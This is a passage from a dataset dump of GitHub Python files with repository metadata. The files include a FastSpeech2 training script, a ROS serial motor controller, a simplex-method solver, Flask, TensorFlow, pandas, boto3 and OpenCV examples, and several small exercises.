\"energy_min\": -1.375638484954834,\n # \"batch_size\": 8,\n # \"save_interval\": 100,\n \"num_workers\": 4,\n # \"max_step\": 201,\n\n \"metadata_path\": \"./metadata\",\n \"global_optimal_checkpoint_stat_path\": \"./global-optimal-checkpoint-status.json\",\n \"data_refs_filename\": \"data_refs.json\",\n\n \"fs2_data_base_path\": \"./data\",\n \"data_intermediate_regex\": \"\\d{8}-\\d{6}-intermediate\"\n }\n\n torch.backends.cudnn.benchmark = True\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n pretrained_checkpoint_path = None\n\n current_data_path_instance = Path(paths['current_data'])\n current_preprocessed_finished_path = current_data_path_instance.parent / '-'.join(current_data_path_instance.stem.split('-')[:-1]) / config['preprocessed_path']\n\n preprocessed_paths = [paths['preprocessed']]\n data_refs = [str(current_preprocessed_finished_path)]\n\n if Path(paths['global_optimal_checkpoint_status']).exists():\n with open(paths['global_optimal_checkpoint_status'], 'r') as f:\n global_optimal_checkpoint = json.load(f)\n \n previous_checkpoint_base_path = global_optimal_checkpoint['base_path']\n pretrained_checkpoint_path = os.path.join(previous_checkpoint_base_path, global_optimal_checkpoint['deployed_checkpoint']['path'])\n\n previous_checkpoint_paths = get_paths(base_path=data_base_path, current_data_path=previous_checkpoint_base_path)\n with open(previous_checkpoint_paths['train_eval_data_refs'], 'r') as f:\n previous_data_refs = json.load(f)\n data_refs.extend(previous_data_refs)\n \n search_path_pattern = paths['data'] + '/*/' + config[\"preprocessed_path\"]\n search_path_filter_regex = re.compile(config[\"data_intermediate_regex\"])\n rest_preprocessed_paths = get_rest_path_from(search_path_pattern=search_path_pattern,\n exclude_paths=previous_data_refs + [current_data_path],\n search_path_filter_regex=search_path_filter_regex)\n\n if rest_preprocessed_paths:\n print(f'INFO: find {len(rest_preprocessed_paths)} rest of preprocessed path(s)')\n print(f'INFO: {rest_preprocessed_paths}')\n print(f'INFO: set these to additional load path')\n\n preprocessed_paths.extend(rest_preprocessed_paths)\n data_refs.extend(rest_preprocessed_paths)\n\n main(pretrained_path=pretrained_checkpoint_path, train_epoch=train_epoch, batch_size=batch_size, \n number_of_model_save_per_epoch=number_of_model_save_per_epoch,\n preprocessed_paths=preprocessed_paths,\n save_dir=paths['train_output'],\n **parse_kwargs(main, **config))\n\n with open(paths['train_eval_data_refs'], 'w') as f:\n json.dump(data_refs, f, indent=2)\n\n from collections import namedtuple\n train_outputs = namedtuple(\n 'train_outputs',\n ['data_ref_paths']\n )\n\n return train_outputs(preprocessed_paths)\n\n\nif __name__ == '__main__':\n res = train('/local-storage', '/local-storage/fs2-data/data/20211017-191719-intermediate', train_epoch=1, batch_size=8, number_of_model_save_per_epoch=1)\n print(res)\n","repo_name":"fibremint/fastspeech2-ml-pipeline","sub_path":"components/ops/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25602059520","text":"#! /usr/bin/env python3\n\n# __author__ = \"Praneesh Kataru\"\n# __credits__ = []\n# __version__ = \"0.1.1\"\n# __maintainer__ = \"Praneesh Kataru\"\n# __email__ = \"pranuvitmsse05@gmail.com\"\n# __status__ = \"Prototype\"\n\nimport json\nfrom os import path\n\n\nclass UserStockPrefDAL:\n db_exception = None\n user_all_prefs = None\n\n def __init__(self):\n self.user_stock_pref_db_file = path.join(path.dirname(path.abspath(__file__)), 'database/UserStockPref.json')\n try:\n with open(self.user_stock_pref_db_file,'r') as json_data:\n self.user_all_prefs = json.load(json_data)\n except Exception as general_exception:\n self.db_exception = general_exception\n\n def get_all_user_preferences(self):\n \"\"\" Returns the stock interests of all users \"\"\"\n return self.db_exception, self.user_all_prefs\n\n def get_all_stock_preferences(self):\n \"\"\"Gets all the stocks that users are interested in..\"\"\"\n ret_all_stock_keys = set()\n available_user_prefs = self.user_all_prefs\n for user_preference in available_user_prefs:\n user_pref_stocks = user_preference[\"userStocks\"]\n for stockItem in user_pref_stocks:\n ret_all_stock_keys.add(stockItem['key'])\n return self.db_exception, ret_all_stock_keys\n\n def get_stock_preferences_by_user_id(self, user_id):\n \"\"\" Returns the stock interests of a user \"\"\"\n ret_user_pref = None\n ret_select_exception = None\n available_preferences = self.user_all_prefs\n for user_preference in available_preferences:\n if user_id == user_preference['userID']:\n ret_user_pref = user_preference\n break\n return ret_select_exception, ret_user_pref\n\n def get_users_by_stock_preference(self, stock_key):\n \"\"\"Returns the list of users who are interested in a particular stock item\"\"\"\n ret_stock_pref_user_list = list()\n ret_select_exception = None\n available_preferences = self.user_all_prefs\n for user_preference in available_preferences:\n user_preferred_stocks = user_preference['userStocks']\n for stock in user_preferred_stocks:\n if stock['key'] == stock_key:\n ret_stock_pref_user_list.append(user_preference['userID'])\n break\n return ret_select_exception, ret_stock_pref_user_list\n\n def update_stock_preference_for_user(self, user_id, stock_key):\n \"\"\"Updates the stock preference of a user\"\"\"\n ret_update_exception = None\n ret_update_status = False\n user_all_current_prefs = self.user_all_prefs\n for user_preference in user_all_current_prefs:\n if user_id == user_preference['userID']:\n # Create a new stock key object\n user_new_stock = dict()\n user_new_stock['key'] = stock_key\n\n # Update the existing stock key object - check for existence of an element before updatinng\n user_preference['userStocks'].append(user_new_stock)\n break;\n print(user_all_current_prefs)\n\n # Now open the file in write mode and dump into it.\n try:\n stock_pref_json_file = open(self.user_stock_pref_db_file, \"w+\")\n stock_pref_json_file.write(json.dumps(user_all_current_prefs))\n ret_update_status = True\n stock_pref_json_file.close()\n except Exception as general_exception:\n ret_update_exception = general_exception\n finally:\n return ret_update_exception, ret_update_status\n\n\n","repo_name":"Praneesh/quickstocks","sub_path":"qs_backend/qs_backend/dal/user_stock_pref_dal.py","file_name":"user_stock_pref_dal.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"8734541045","text":"from app import app,mysql,save_images,save_music\nfrom flask import Flask,render_template,request,redirect,flash,session,url_for,current_app,jsonify\nfrom flask_fontawesome import fontawesome_css\nfrom playsound import playsound\nimport os\n\ndef artists():\n artists = []\n f = open('app/artists.txt','r')\n for line in f:\n artists.append(line.split(\",\"))\n return artists\n\n\n\n\n\n\n\"\"\"\n Music dashboard\n\n\"\"\"\n@app.route('/music',methods=[\"GET\",\"POST\"])\ndef dashboard():\n genre = [['pop','bg.jpg'],['jazz','jazz.jpg'],['devotional','dev.jpg'],['hip hop','hiphop.jpg'],['workout',\"workout.jpg\"],['sad','sad1.jpg'],['happy','happy.jpg'],[\"Melody\",\"melody.jpg\"]]\n artist = artists()\n return render_template(\"user_dashboard/music_dash.html\",genres=genre, artists = artist)\n\n\n\n\n\"\"\"\n Playlist According to Genres\n\"\"\"\n@app.route('/genre',methods=[\"GET\",\"POST\"])\ndef genre():\n songs = ['mood','sketches']\n return jsonify({'data': render_template(\"user_dashboard/genre.html\",songs=songs)})\n\n\n\n\n\"\"\"\n Playlist and Albums of Artists\n\"\"\"\n@app.route('/music/artist',methods=[\"GET\",\"POST\"])\ndef artist():\n music = []\n music.append(os.path.join(\"mood.mp3\"))\n music.append(os.path.join(\"sketches.mp3\"))\n return render_template(\"user_dashboard/music.html\", songs=music)","repo_name":"mitra-31/dbmsproject_git","sub_path":"app/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19223714444","text":"\nclass Simplex:\n def __init__(self):\n self.A = [] # переменная для матрицы\n self.m, self.n = 2, 2 # m - кол-во станков n - количество деталей\n self.bj = None\n self.x_value = {}\n self.k = 0\n self.A.append([])\n self.A[0].append(\"S\\X\")\n\n print(self.x_value)\n self.C = list()\n\n self.Z = [\"Z\"]\n self.input()\n for i in range(self.m):\n for j in range(self.n):\n self.A[0].append('X' + str(i) + str(j))\n string = 'X' + str(i) + str(j)\n\n self.x_value[string] = 0\n\n for i in self.C :\n print(i)\n self.preprocessCon(self.C)\n self.Z.append(0)\n self.A.append(self.Z)\n self.A[0].append(\"B\")\n for i in self.A:\n string = \"\"\n for j in i:\n string = string + \"\\t\\t\" + str(j)\n print(string)\n self.simplex()\n for i in range(1, len(self.A) - 1):\n self.x_value[self.A[i][0]] = self.A[i][-1]\n\n self.x = list()\n for i in range(self.m):\n for j in range(self.n):\n string = 'X' + str(i) + str(j)\n self.x.append(self.x_value[string])\n\n self.goint()\n for i in range(self.m):\n for j in range(self.n):\n string = 'X' + str(i) + str(j)\n print(string + \" = \", self.x[i * self.n + j])\n res = 0\n for i in range(1, len(self.Z) - 1):\n res = res + self.Z[i] * self.x[i - 1]\n\n print(\"Z = \", -1 * res)\n\n # проверка на оптимальность для двойственной таблицы\n def optimum2(self):\n for i in range(1, len(self.A) - 1):\n if self.A[i][-1] <= 0:\n print(\"Таблица не оптимальна!!!!\")\n return True\n\n return False\n\n # поиск максимальной строки для двойственной таблицы\n def maximum_s(self):\n maximum = 1\n for i in range(2, len(self.A) - 1):\n if self.A[maximum][-1] >= 0:\n maximum = i\n continue\n if self.A[maximum][-1] > self.A[i][-1]:\n maximum = i\n return maximum\n\n \"\"\"поиск минимального столбца для двойственной таблицы\n maximum -> получается из self.maximum_s()\"\"\"\n\n def minimum_r(self, maximum):\n lst = list()\n for i in range(1, len(self.A[0]) - 1):\n if self.A[maximum][i] >= 0:\n lst.append(99999)\n else:\n lst.append(self.A[-1][i] / self.A[maximum][i])\n minimum = 0\n for i in range(1, len(lst)):\n if lst[minimum] > lst[i]:\n minimum = i\n\n return minimum + 1\n\n # Формируем Симплекс таблицу\n def preprocessCon(self, con):\n for cont in con:\n sign = cont[-2]\n if sign == \"<=\":\n self.A.append([])\n self.A[self.k + 1].append(\"S\" + str(self.k))\n for i in range(len(cont) - 2):\n self.A[self.k + 1].append(cont[i])\n self.A[self.k + 1].append(cont[-1])\n self.k += 1\n if sign == \"=\":\n self.A.append([])\n self.A[self.k + 1].append(\"0\")\n for i in range(len(cont) - 2):\n self.A[self.k + 1].append(cont[i])\n self.A[self.k + 1].append(cont[-1])\n self.k += 1\n if sign == \">=\":\n for i in range(len(cont) - 2):\n cont[i] = -1 * cont[i]\n cont[-1] = cont[-1] * -1\n self.A.append([])\n self.A[self.k + 1].append(\"S\" + str(self.k))\n for i in range(len(cont) - 2):\n self.A[self.k + 1].append(cont[i])\n self.A[self.k + 1].append(cont[-1])\n self.k += 1\n\n # Поиск разрешающего столбца\n def searchMin(self):\n Min = 1\n for i in range(2, len(self.A[-1]) - 1):\n if self.A[-1][i] > 0:\n if self.A[-1][i] > self.A[-1][Min]:\n Min = i\n return Min\n\n # Поиск разрешающей строки\n def searchMin2(self, Min):\n lst = list()\n for i in range(1, len(self.A) - 1):\n if self.A[i][Min] != 0:\n lst.append(self.A[i][-1] / self.A[i][Min])\n else:\n lst.append(-1)\n maximum = 0\n for i in range(1, len(lst)):\n if lst[i] >= 0 and lst[i] <= lst[maximum]:\n maximum = i\n return maximum + 1\n\n # Строки и столбца в названиях\n def swap(self, Min1, Min2):\n self.A[0][Min1], self.A[Min2][0] = self.A[Min2][0], self.A[0][Min1]\n\n # Если переменная нуливая мы можем ее не учитывать, значит этот столбец можно удалить.\n def del_null(self, Min):\n if self.A[0][Min] == \"0\":\n for i in range(len(self.A)):\n del self.A[i][Min]\n\n # Проверка на оптимальность решения.\n def optimum(self):\n for i in range(1, len(self.A[-1]) - 1):\n if self.A[-1][i] >= 0:\n print(\"Таблица не оптимальна\")\n return True\n print(\"Таблица Оптимальна \")\n return False\n\n # Пересчет таблицы относительно разрешающего элемента\n def calculate(self, max_r, min_s):\n new_a = []\n k = 0\n print(\"Разрешающий Элемент: \", min_s, max_r)\n for i in range(1, len(self.A) - 1):\n new_a.append([])\n new_a[k].append(self.A[i][0])\n for j in range(1, len(self.A[0]) - 1):\n if j == max_r:\n if i == min_s:\n new_a[k].append(1 / self.A[i][j])\n else:\n new_a[k].append(-1 * self.A[i][j] / self.A[min_s][max_r])\n else:\n if i == min_s:\n new_a[k].append(self.A[i][j] / self.A[min_s][max_r])\n else:\n new_a[k].append((self.A[i][j] * self.A[min_s][max_r] - (self.A[i][max_r] * self.A[min_s][j])) /\n self.A[min_s][max_r])\n\n k += 1\n new_a.append([])\n new_a[k].append(\"Z\")\n for i in range(1, len(self.A[0]) - 1):\n if i == max_r:\n new_a[k].append(-1 * self.A[-1][i] / self.A[min_s][max_r])\n else:\n new_a[k].append(\n (self.A[-1][i] * self.A[min_s][max_r] - self.A[-1][max_r] * self.A[min_s][i]) / self.A[min_s][\n max_r])\n\n if i == min_s:\n new_a[i - 1].append(self.A[i][-1] / self.A[min_s][max_r])\n else:\n new_a[i - 1].append(\n (self.A[i][-1] * self.A[min_s][max_r] - self.A[min_s][-1] * self.A[i][max_r]) / self.A[min_s][\n max_r])\n\n new_a.insert(0, [])\n k += 1\n for i in self.A[0]:\n new_a[0].append(i)\n\n z = (self.A[-1][-1] * self.A[min_s][max_r] - self.A[-1][max_r] * self.A[min_s][-1]) / self.A[min_s][max_r]\n new_a[-1].append(z)\n for i in range(len(self.A)):\n self.A[i] = new_a[i]\n\n # Вывод таблицы\n def print_table(self):\n string = \"\"\n for i in self.A[0]:\n string = string + \"\\t\\t\\t\" + i\n print(string)\n for i in range(1, len(self.A)):\n string = \"\\t\\t\\t\" + self.A[i][0]\n for j in range(1, len(self.A[0])):\n string = string + \"\\t\\t\\t\" + str(round(self.A[i][j], 2))\n print(string)\n\n\n\n \"\"\"Метод для запуска подсчета симплекс методом для таблицы A\n s/x x1 x2 x3 x4 ... B\n s1 c1 c2 c3 c4 ... b1 \n s2 c5 c6 ... b2\n A = s3 ... b3\n s4 ... b4\n ... ...\n Z z1 z2 z3 z4 ... Zmax(min)\n \"\"\"\n\n def simplex(self):\n k = 1\n while self.optimum2():\n print(\"ITER \", k)\n max_s = self.maximum_s()\n print(\"MAX_S: \", max_s)\n min_r = self.minimum_r(max_s)\n print(\"MIN_R\", min_r)\n self.swap(min_r, max_s)\n self.calculate(min_r, max_s)\n self.print_table()\n k += 1\n\n # Функция ввода\n def input(self):\n print(\"\\n\".join((\n \"*******************************************************************************\",\n \"Задача\",\n \"Имеется m - станков, на которых обрабатываются детали n - типов.\",\n \"На работу i-го станка отводится время ai\",\n \"По плану требуется отработать bj деталий j-го типа.\",\n \"Обработка i-м станком j-ой детали связана с подготовительными операциями\",\n \"требующие время tij, Сама обработка знамает время aij, а её стоимость равна cij\",\n \"Требуется составить оптимальный по стоимости план загрузки станков\",\n \"********************************************************************************\"\n )))\n m = int(input(\"Введите m: \"))\n n = int(input(\"Введите n: \"))\n ai = []\n bj = []\n tij = []\n aij = []\n cij = []\n for i in range(m):\n string = \"Введите a\" + str((i + 1)) + \": \"\n ai.append(float(input(string)))\n\n for j in range(n):\n string = \"Введите b\" + str((j + 1)) + \": \"\n bj.append(float(input(string)))\n\n for i in range(m):\n lst1 = []\n lst2 = []\n lst3 = []\n for j in range(n):\n string1 = \"Введите t\" + str((i + 1)) + str((j + 1)) + \": \"\n string2 = \"Введите a\" + str((i + 1)) + str((j + 1)) + \": \"\n string3 = \"Введите c\" + str((i + 1)) + str((j + 1)) + \": \"\n lst1.append(float(input(string1)))\n lst2.append(float(input(string2)))\n lst3.append(float(input(string3)))\n\n tij.append(lst1)\n aij.append(lst2)\n cij.append(lst3)\n string = \"Z = \"\n for ci in range(m):\n for c in range(n):\n string = string + \" \" + str(cij[ci][c]) + \"x\" + str(ci) + str(c)\n string = string + \"-> min\"\n print(string)\n for i in range(m):\n for j in range(n):\n self.Z.append(-1 * cij[i][j])\n full = n * m\n for i in range(n):\n lst1 = []\n for z in range(i * m):\n lst1.append(0)\n for j in range(m):\n lst1.append(1)\n for z in range(full - (i + 1) * m):\n lst1.append(0)\n\n lst1.append('>=')\n lst1.append(bj[i])\n self.C.append(lst1)\n\n for i in range(m):\n lst1 = []\n for j in range(n):\n lst1.append(tij[j][i] + aij[j][i])\n for z in range(m - 1):\n lst1.append(0)\n if i == 1:\n lst1.pop()\n lst1.insert(0, 0)\n lst1.append('<=')\n lst1.append(ai[i])\n self.C.append(lst1)\n\n self.m, self.n = m, n\n self.bj = bj\n\n # Функция округления\n def goint(self):\n for i in range(self.n):\n z = self.bj[i]\n for j in range(self.m):\n self.x[i * self.m + j] = round(self.x[i * self.m + j])\n z = z - self.x[i * self.m + j]\n if z > 0:\n max = self.x[i * self.m]\n jmin = 0\n for j in range(1, self.m):\n if max > self.x[i * self.m + j]:\n jmin = j\n self.x[i * self.m + jmin] = self.x[i * self.m + jmin] - z\n else:\n max = self.x[i * self.m]\n jmin = 0\n for j in range(1, self.m):\n if max < self.x[i * self.m + j]:\n max = self.x[i * self.m + j]\n jmin = j\n self.x[i * self.m + jmin] = self.x[i * self.m + jmin] + z\n\n\nSimplex()\n","repo_name":"fakecharge/NikulinLB","sub_path":"simplex_method.py","file_name":"simplex_method.py","file_ext":"py","file_size_in_byte":13025,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8307054349","text":"n, m = map(int, input().split())\nans = []\ndef back():\n if m == len(ans):\n print(*ans)\n return\n for i in range(1, n+1):\n ans.append(i)\n back()\n ans.pop()\n\nback()","repo_name":"ssatudy/JiEun_AlgoStudy","sub_path":"0921.nm/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12108634984","text":"#!/usr/bin/env python\nimport json\nimport serial\nimport rospy\nfrom robot.srv import encoders, encodersResponse\nfrom threading import Thread\nfrom geometry_msgs.msg import Twist, Vector3\nimport sys\nimport time\nfrom std_msgs.msg import String\n\n \n\n#position thread\nclass getPosThread(Thread):\n def __init__(self, serial):\n Thread.__init__(self)\n self.__serial = serial\n return\n def run(self):\n \n rospy.Service('encoders', encoders, self.handle_encoders)\n rospy.spin()\n\n def getPosition(self):\n sr =\"enc=(-1;-1)\"\n if (not self.__serial.busy()):\n self.__serial.setBusy() #---------\n #print(\"encodeurs: envoie => \")\n getit = True\n #envoie de la commande\n self.__serial.write(b\"M404 \\n\")\n \n #reccuperation de la valeur des encodeurs\n i = 0\n while getit:\n \n by = self.__serial.readline()\n sr=by.decode('utf-8')\n getit = not \"enc=\"in sr\n i+=1\n if i >2:\n getit = False\n sr = \"enc=(-1;-1)\"\n #print(\"encodeurs: fin <= \")\n self.__serial.setUnbusy()#---------\n \n return sr\n\n def handle_encoders(self, req):\n #on renvoie le position du client\n strData = self.getPosition()\n data = strData.replace('enc=(', '').replace(')', '').split(';')\n \n return encodersResponse(float(data[0]),float(data[1])) \n\n\nclass setPosConsignThread(Thread):\n def __init__(self, serial):\n Thread.__init__(self)\n self.__serial = serial\n\n def run(self):\n rospy.Subscriber(\"robot_consign\", Twist, self.getConsign)\n rospy.spin()\n\n def getConsign(self, cons):\n gcode = \"\"\n if cons.angular.z == 0:\n gcode = \"G26 X{0:.2f} Y{1:.2f} \\n\".format(cons.linear.x, cons.linear.y)\n elif cons.angular.z == 1:\n gcode = \"G11 I{0:.2f} J{1:.2f} \\n\".format(cons.linear.x, cons.linear.y)\n elif cons.angular.z == 2:\n gcode = \"G10 I{0:.2f} J{1:.2f} \\n\".format(cons.linear.x, cons.angular.x)\n elif cons.angular.z == 3:\n gcode = \"G13 I{0:.2f} J{1:.2f} \\n\".format(cons.linear.x, cons.angular.x)\n self.__serial.sendGcode(gcode) \n \n\n\nclass requestMotorThread(Thread):\n def __init__(self, serial):\n Thread.__init__(self)\n self.__serial = serial\n\n def run(self):\n \n rospy.Subscriber(\"server_req\", String, self.sendReq)\n rospy.spin()\n\n def sendReq(self, req):\n \n #conversion en objet\n try:\n req = json.loads(req.data)\n \n \n gcode = \"\"\n if(req[\"type\"] == \"motor_request\"):\n if(req[\"request\"] == \"set_pid_left\"):\n gcode = \"M301 P{0:.3f} I{1:.3f} D{2:.3f} \\n\".format(req[\"p\"], req[\"i\"], req[\"d\"])\n elif(req[\"request\"] == \"set_pid_right\"):\n gcode = \"M302 P{0:.3f} I{1:.3f} D{2:.3f} \\n\".format(req[\"p\"], req[\"i\"], req[\"d\"])\n elif(req[\"request\"] == \"set_power_k\"):\n gcode = \"M323 I{0:.3f} J{1:.3f} \\n\".format(req[\"l\"], req[\"r\"])\n elif(req[\"request\"] == \"set_measure_k\"):\n gcode = \"M324 I{0:.3f} J{1:.3f} \\n\".format(req[\"l\"], req[\"r\"])\n self.__serial.sendGcode(\"M400 \\n\") \n self.__serial.sendGcode(gcode) \n #enregistrement\n \n except Exception:\n pass\n\n\n\nclass MotSerial(serial.Serial):\n def __init__(self, serialName):\n serial.Serial.__init__(self, serialName, 115200, timeout=0)\n self.__serialBusy = False\n def busy(self):\n return self.__serialBusy\n def setUnbusy(self):\n self.__serialBusy = False\n def setBusy(self):\n self.__serialBusy = True\n def sendGcode(self, gcode):\n sended = False\n while not sended:\n if (not self.busy()):\n self.setBusy() #---------\n time.sleep(0.01)\n self.write(gcode.encode(\"utf8\"))\n print(gcode)\n sended = True\n self.setUnbusy()#---------\n def sendWithResponse(self, gcode):\n if (not self.busy()):\n self.setBusy() #---------\n getit = True\n #envoie de la commande\n self.write(gcode.encode(\"utf8\"))\n \n #reccuperation de la valeur des encodeurs\n i = 0\n while getit:\n \n by = self.readline()\n sr=by.decode('utf-8')\n getit = not \"enc=\"in sr #a finir\n i+=1\n if i >2:\n getit = False\n sr = \"response_failed\"\n #print(\"encodeurs: fin <= \")\n self.setUnbusy()#---------\n \n return sr\n pass\n\nserialName = rospy.get_param(\"motor_controller_port\", \"/dev/ttyACM0\")\n\nprint(serial.__file__)\nser = MotSerial(serialName)\n\n#execution server position\nrospy.init_node('serialCon')\n\nposServer = getPosThread(ser)\nposServer.start()\n\nconsServer = setPosConsignThread(ser)\nconsServer.start()\n#server motor request\nreqServer = requestMotorThread(ser)\nreqServer.start()\n\n\"\"\"print(\"'out' to exit\")\nwhile 1:\n strIn = input('cmd: ')\n #print(strIn)\"\"\"\n\n","repo_name":"momo2555/robot","sub_path":"scripts/serialCon.py","file_name":"serialCon.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"38516819552","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport os\nimport tensorflow as tf\nimport numpy as np\n\n\ndef convnet(X, conv_layer1_W, conv_layer2_W, conv_layer1_b, conv_layer2_b, dense_layer_W, dense_layer_b):\n\n scores = None\n conv_layer1_out = tf.nn.conv2d(X, conv_layer1_W, strides=[1,1,1,1], padding=\"SAME\")\n conv_layer1_out += conv_layer1_b\n relu_layer1_out = tf.nn.relu(conv_layer1_out)\n \n conv_layer2_out = tf.nn.conv2d(conv_layer1_out, conv_layer2_W, strides=[1,1,1,1], padding=\"SAME\")\n conv_layer2_out += conv_layer2_b\n relu_layer2_out = tf.nn.relu(conv_layer2_out)\n \n #flatten the output from ReLU layer\n N = tf.shape(relu_layer2_out)[0]\n relu_layer2_out = tf.reshape(relu_layer2_out, (N, -1))\n output = tf.matmul(relu_layer2_out, dense_layer_W)\n output += dense_layer_b\n \n return output\n\n\nX = tf.placeholder(tf.float32)\nconv_layer1_W = tf.random.normal((5, 5, 3, 6))\nconv_layer2_W = tf.random.normal((2, 2, 6, 9))\nconv_layer1_b = tf.random.normal((6,))\nconv_layer2_b = tf.random.normal((9,))\ndense_layer_W = tf.random.normal((32 * 32 * 9, 10))\ndense_layer_b = tf.random.normal((10,))\nscores = convnet(X, conv_layer1_W, conv_layer2_W, conv_layer1_b, conv_layer2_b, dense_layer_W, dense_layer_b)\n\nX_np = np.random.rand(10, 32, 32, 3)\n \nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n scores_np = sess.run(scores, feed_dict={X: X_np})\n print(scores_np)\n\n\n","repo_name":"tarun0409/smai-assignment-6","sub_path":"src/q-3-1.py","file_name":"q-3-1.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36826870131","text":"num = ('zero', 'um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez', 'onze', 'doze', 'treze',\n 'quatorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')\n\nopc = 0\nwhile True:\n opc = int(input('Digite um número de 0 a 20 : '))\n if 0 <= opc <= 20:\n break\n print('Número Inválido!', end = ' ')\n\nprint(f'Você escolheu o número {num[opc]}!')","repo_name":"CaNeoN28/MyPython","sub_path":"pythonExercicios/tuplas/ex072.py","file_name":"ex072.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1346547544","text":"import pandas\n\n# def space_del(data):\n# return data[:-1]\n#\n#\n# with open('weather_data.csv', mode=\"r\") as data:\n# initial_data_list = []\n# for x in data.readlines():\n# initial_data_list.append(x)\n#\n# data_header = initial_data_list[0].split(',')\n# data_header[-1] = space_del(data_header[-1])\n# initial_data_list[0] = data_header\n#\n# finished_data_list = []\n# for x in range(1, len(initial_data_list)):\n# seperated_data = initial_data_list[x].split(',')\n# seperated_data[-1] = space_del(seperated_data[-1])\n# individual_obj = {}\n# for y in range(len(initial_data_list[0])):\n# individual_obj[data_header[y]] = seperated_data[y]\n# finished_data_list.append(individual_obj)\n# print(finished_data_list)\n\n# import csv\n#\n# with open('weather_data.csv', mode=\"r\") as data_file:\n# data = csv.reader(data_file)\n# lista = []\n# for row in data:\n# if row[1] != 'temp':\n# lista.append(int(row[1]))\n# print(lista)\n\n# data = pandas.read_csv('weather_data.csv')\n# print(data[data.temp == data.temp.max()])\n# list_temp = data['temp'].to_list()\n# sum_of_temps = 0\n#\n# for x in list_temp:\n# sum_of_temps += x\n#\n# print(round(sum_of_temps/len(list_temp), 2))\n\n# print(data[data.day == 'Monday'].temp*(9/5)+32)\n\n# data_dict = {\n# 'students': ['Student1', 'Student2', 'Student3'],\n# 'scores': [8, 6, 2]\n# }\n#\n# data = pandas.DataFrame(data_dict)\n# data.to_csv('students_dict.csv')\n\ndata = pandas.read_csv('2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv')\ndata_gray = data[data['Primary Fur Color'] == 'Gray']\ndata_black = data[data['Primary Fur Color'] == 'Black']\ndata_cinnamon = data[data['Primary Fur Color'] == 'Cinnamon']\n\nlist_data_colors = {'Fur Color': ['grey', 'black', 'red'], 'Count': [len(data_gray), len(data_black),\n len(data_cinnamon)]}\n\ndata_conversion = pandas.DataFrame(list_data_colors)\nprint(data_conversion)\ndata_conversion.to_csv('squirrels_color.csv')\n","repo_name":"BinayT/Python100DOC","sub_path":"Day-25-Pandas-Library/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"69906329378","text":"import boto3\nfrom botocore.exceptions import ClientError\n\ns3 = boto3.client('s3')\n\n\ndef upload_file(input_name, bucket_name, output_name):\n with open(input_name, 'rb') as file:\n try:\n s3.upload_fileobj(file, bucket_name, output_name)\n except ClientError as e:\n print(e)\n return\n print('file has been uploaded')\n\n\nif __name__ == '__main__':\n upload_file(\"./src/IMG_1002.JPG\", 'btu-devops-nk-2023', 'IMG_1003.JPG')\n","repo_name":"freexnick/aws","sub_path":"assignment-03/s3_upload_file.py","file_name":"s3_upload_file.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37461809663","text":"import numpy as np\nimport cv2\nimg_dir = './testdata/1.jpg'\n\ndef onChange(pos): # 트랙바 핸들러\n global img\n # 트랙바의 값 받아오기\n # 트랙바 이름, 윈도우 창 이름\n thresh = cv2.getTrackbarPos('threshold', 'Trackbar Windows')\n maxval = cv2.getTrackbarPos(\"maxValue\", \"Trackbar Windows\")\n _, binary = cv2.threshold(src, thresh, maxval, cv2.THRESH_BINARY)\n\n cv2.imshow('Trackbar Windows', binary)\n\n\nsrc = cv2.imread(img_dir, cv2.IMREAD_GRAYSCALE)\n# cv2.imshow('img', img) # GUI(윈도우)창 생성, 이미지 보여주기\n\n# 트랙바 생성\n# 트랙바 이름, 윈도우 창 이름, 최소값, 최대값, 콜백 함수\ncv2.namedWindow(\"Trackbar Windows\", flags=cv2.WINDOW_KEEPRATIO )\n\ncv2.createTrackbar(\"threshold\", \"Trackbar Windows\", 0, 255, onChange)\ncv2.createTrackbar(\"maxValue\", \"Trackbar Windows\", 0, 255, lambda x : x)\n\ncv2.setTrackbarPos(\"threshold\", \"Trackbar Windows\", 127)\ncv2.setTrackbarPos(\"maxValue\", \"Trackbar Windows\", 255)\n\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"ChaeChae0505/Using","sub_path":"ComputerVision/thresholdbar.py","file_name":"thresholdbar.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3655621979","text":"# ~~~~~~~~~~~~~~ HRV ~~~~~~~~~~~~~~~~~~~ #\nimport tkinter.constants as TKc\nfrom tkinter import Frame, FALSE, messagebox, Label, StringVar, OptionMenu, Entry, Button, Toplevel\nfrom utils.Graphical_Functions import *\nfrom utils.Style_Functions import headerStyles\nfrom utils.writers.export import Exporter\nfrom utils.viewers import PlotViewer\n\n\nclass HRVstatics(Frame):\n \"\"\"\n 